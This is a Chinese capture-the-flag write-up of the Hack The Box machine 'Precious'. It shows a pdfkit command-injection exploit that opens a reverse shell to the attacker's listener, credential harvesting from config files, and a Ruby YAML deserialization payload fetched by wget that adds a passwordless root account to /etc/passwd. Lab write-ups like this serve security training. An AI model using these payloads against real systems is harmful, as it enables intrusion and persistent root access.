HTB:Precious[WriteUP]

目录

连接至HTB服务器并启动靶机

使用nmap对靶机TCP端口进行开放扫描

使用curl访问靶机80端口

使用ffuf爆破一下子域

使用浏览器访问该域名

使用curl访问该域名响应头

使用exiftool工具查看该pdf信息

横向移动

USER_FLAG:adf5793a876a190f0c08b3b6247cec32

特权提升

ROOT_FLAG:f1f5fd20bc4c3cdfae0299947296fbb6


连接至HTB服务器并启动靶机

靶机IP:10.10.11.189

分配IP:10.10.16.7


使用nmap对靶机TCP端口进行开放扫描

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.189

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.189

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 23:24 EST

Warning: 10.10.11.189 giving up on port because retransmission cap hit (2).

Nmap scan report for 10.10.11.189 (10.10.11.189)

Host is up (0.15s latency).

Not shown: 65507 closed tcp ports (reset), 26 filtered tcp ports (no-response)

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 46.17 seconds

再次使用nmap对靶机22、80端口进行脚本、服务扫描

nmap -p 22,80 -sCV 10.10.11.189

使用curl访问靶机80端口

curl -I http://10.10.11.189:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# curl -I http://10.10.11.189:80

HTTP/1.1 302 Moved Temporarily

Server: nginx/1.18.0

Date: Sun, 10 Nov 2024 05:20:11 GMT

Content-Type: text/html

Content-Length: 145

Connection: keep-alive

Location: http://precious.htb/

将该域名与靶机IP绑定

echo '10.10.11.189 precious.htb' >> /etc/hosts

使用ffuf爆破一下子域

ffuf -u http://precious.htb/ -H 'Host: FUZZ.precious.htb' -w ../dictionary/subdomains-top20000.txt -t 200 -fc 302

再使用ffuf对该域名路径FUZZ

ffuf -u http://precious.htb/FUZZ -w ../dictionary/Common-dir.txt -t 200 -fc 302

使用浏览器访问该域名

这里直接就是一个提交一个URL到靶机上,初次之外也没有其他有用信息了

使用curl访问该域名响应头

curl -I http://precious.htb/

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# curl -I http://precious.htb/

HTTP/1.1 200 OK

Content-Type: text/html;charset=utf-8

Content-Length: 483

Connection: keep-alive

Status: 200 OK

X-XSS-Protection: 1; mode=block

X-Content-Type-Options: nosniff

X-Frame-Options: SAMEORIGIN

Date: Sun, 10 Nov 2024 06:06:21 GMT

X-Powered-By: Phusion Passenger(R) 6.0.15

Server: nginx/1.18.0 + Phusion Passenger(R) 6.0.15

X-Runtime: Ruby

可以看到页面返回了一个Ruby,所以这页面很可能就是用ruby语言编写

本地编写一个test.txt文件

echo 'This is a test text' > test.txt

利用python开启一个http服务

python -m http.server 7777

靶机URL上传至将test.txt文件进行下载

点击Submit后成功进行了转换

使用exiftool工具查看该pdf信息

.\exiftool.exe .\vxwb2a1xjsyl4ljfe7saqov548euun2v.pdf

使用searchsploit搜索关键词pdfkit

searchsploit pdfkit

可以看到该EXP版本是符合我们这次的靶机利用要求的

将EXP拷贝到当前目录下

searchsploit -m 51293.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# searchsploit -m 51293.py

Exploit: pdfkit v0.8.7.2 - Command Injection

URL: https://www.exploit-db.com/exploits/51293

Path: /usr/share/exploitdb/exploits/ruby/local/51293.py

Codes: CVE-2022--25765

Verified: True

File Type: Python script, Unicode text, UTF-8 text executable

Copied to: /home/kali/Desktop/temp/51293.py

看一下该EXP需要填写的参数

使用Yakit抓包,看一下提交时的POST参数

本地侧nc开始监听

nc -lvnp 1425

使用EXP获得反弹shell

python 51293.py -s 10.10.16.7 1425 -w http://precious.htb -p url

本地侧nc收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# nc -lvnp 1425

listening on [any] 1425 ...

connect to [10.10.16.7] from (UNKNOWN) [10.10.11.189] 45250

whoami

ruby


横向移动

提升TTY

script -c /bin/bash -q /dev/null

查看系统中的用户

cat /etc/passwd

可登录的用户:root、henry、ruby

我们切换到/tmp目录下

cd /tmp

查找一切与conf字样相关的文件并将输出保存到res.txt文件

find / -name '*conf*' -type f 2>/dev/null | tee res.txt

从res.txt文件中逐行读取文件内容,并匹配henry字样

cat res.txt | xargs -I {} sh -c 'cat {} | grep "henry"'

ruby@precious:/tmp$ cat rex.txt | xargs -I {} sh -c 'cat {} | grep "henry"'

cat rex.txt | xargs -I {} sh -c 'cat {} | grep "henry"'

Value: henry

Value: henry

BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

如此这般便获得了henry的凭证

账户:henry

密码:Q3c1AqGHtoI0aXAYFH

使用上述凭证通过SSH服务登录到靶机

ssh henry@10.10.11.189

查找user_flag位置并查看其内容

henry@precious:~$ find / -name 'user.txt' 2>/dev/null

/home/henry/user.txt

henry@precious:~$ cat /home/henry/user.txt

adf5793a876a190f0c08b3b6247cec32

USER_FLAG:adf5793a876a190f0c08b3b6247cec32


特权提升

查看当前用户可特权运行的命令

sudo -l

henry@precious:~$ sudo -l

Matching Defaults entries for henry on precious:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:

(root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

查看update_dependencies.rb文件内容

cat /opt/update_dependencies.rb
ruby 复制代码
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

简单代码审计后可知,该ruby代码的作用是拿本地的gems库版本与dependencies.yml文件中写的版本进行比对

此处读取YAML文件引起了我的注意,因为它并没有指向具体YAML的绝对地址,这意味着如果我们运行特权命令这个文件将会在我们运行命令的当前目录下开始寻找

查找该文件位置

henry@precious:/opt/sample$ find / -name 'dependencies.yml' 2>/dev/null

/opt/sample/dependencies.yml

查看该文件权限分配

ruby 复制代码
ls -l /opt/sample/dependencies.yml

henry@precious:/opt/sample$ ls -l /opt/sample/dependencies.yml

-rw-r--r-- 1 root root 26 Sep 22 2022 /opt/sample/dependencies.yml

查看该文件内容

ruby 复制代码
cat /opt/sample/dependencies.yml

henry@precious:/opt/sample$ cat /opt/sample/dependencies.yml

yaml: 0.1.1

pdfkit: 0.8.6

我尝试在网上搜索ruby中的YAML.load函数如何能执行命令

根据文中的描述,这个Payload可以导致RCE

ruby 复制代码
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve

我在攻击机本地新建一个dependencies.yml 文件,通过命令执行我尝试新建一个无密码管理员用户0dayhp

ruby 复制代码
echo '0dayhp::0:0:0dayhp:/root:/bin/bash' >> /etc/passwd

  • !ruby/object:Gem::Installer

i: x

  • !ruby/object:Gem::SpecFetcher

i: y

  • !ruby/object:Gem::Requirement

requirements:

!ruby/object:Gem::Package::TarReader

io: &1 !ruby/object:Net::BufferedIO

io: &1 !ruby/object:Gem::Package::TarReader::Entry

read: 0

header: "abc"

debug_output: &1 !ruby/object:Net::WriteAdapter

socket: &1 !ruby/object:Gem::RequestSet

sets: !ruby/object:Net::WriteAdapter

socket: !ruby/module 'Kernel'

method_id: :system

git_set: echo '0dayhp::0:0:0dayhp:/root:/bin/bash' >> /etc/passwd

method_id: :resolve

本地通过python开启一个http服务

ruby 复制代码
python -m http.server 7777

靶机进入/tmp目录下,下载该文件

ruby 复制代码
wget http://10.10.16.7:7777/dependencies.yml -O dependencies.yml

直接sudo运行无密码特权命令

henry@precious:/tmp$ sudo /usr/bin/ruby /opt/update_dependencies.rb

sh: 1: reading: not found

Traceback (most recent call last):

33: from /opt/update_dependencies.rb:17:in `<main>'

32: from /opt/update_dependencies.rb:10:in `list_from_file'

31: from /usr/lib/ruby/2.7.0/psych.rb:279:in `load'

30: from /usr/lib/ruby/2.7.0/psych/nodes/node.rb:50:in `to_ruby'

29: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'

28: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'

27: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'

26: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:313:in `visit_Psych_Nodes_Document'

25: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'

24: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'

23: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'

22: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:141:in `visit_Psych_Nodes_Sequence'

21: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `register_empty'

20: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `each'

19: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `block in register_empty'

18: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'

17: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'

16: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'

15: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:208:in `visit_Psych_Nodes_Mapping'

14: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:394:in `revive'

13: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:402:in `init_with'

12: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:218:in `init_with'

11: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:214:in `yaml_initialize'

10: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:299:in `fix_syck_default_key_in_requirements'

9: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_reader.rb:59:in `each'

8: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_header.rb:101:in `from'

7: from /usr/lib/ruby/2.7.0/net/protocol.rb:152:in `read'

6: from /usr/lib/ruby/2.7.0/net/protocol.rb:319:in `LOG'

5: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in `<<'

4: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'

3: from /usr/lib/ruby/vendor_ruby/rubygems/request_set.rb:388:in `resolve'

2: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in `<<'

1: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'

/usr/lib/ruby/2.7.0/net/protocol.rb:458:in `system': no implicit conversion of nil into String (TypeError)

查看/etc/passwd文件内容

ruby 复制代码
cat /etc/passwd

可以看到内容已经被成功添加进了/etc/passwd文件中

切换到0dayhp用户

ruby 复制代码
su 0dayhp

henry@precious:/tmp$ su 0dayhp

root@precious:/tmp# whoami

root

查看root_flag位置并查看其内容

root@precious:/tmp# find / -name 'root.txt'

/root/root.txt

root@precious:/tmp# cat /root/root.txt

f1f5fd20bc4c3cdfae0299947296fbb6

ROOT_FLAG:f1f5fd20bc4c3cdfae0299947296fbb6

相关推荐
.Ayang2 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang2 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
风间琉璃""4 小时前
二进制与网络安全的关系
安全·机器学习·网络安全·逆向·二进制
Che_Che_5 小时前
Cross-Inlining Binary Function Similarity Detection
人工智能·网络安全·gnn·二进制相似度检测
恃宠而骄的佩奇6 小时前
i春秋-签到题
web安全·网络安全·蓝桥杯
follycat6 小时前
信息收集--CDN绕过
网络·安全·网络安全
清风.春不晚9 小时前
shell脚本2---清风
网络·网络安全
Wh1teR0se20 小时前
[极客大挑战 2019]Secret File--详细解析
前端·web安全·网络安全
网安_秋刀鱼1 天前
PHP代码审计 --MVC模型开发框架&rce示例
开发语言·web安全·网络安全·php·mvc·1024程序员节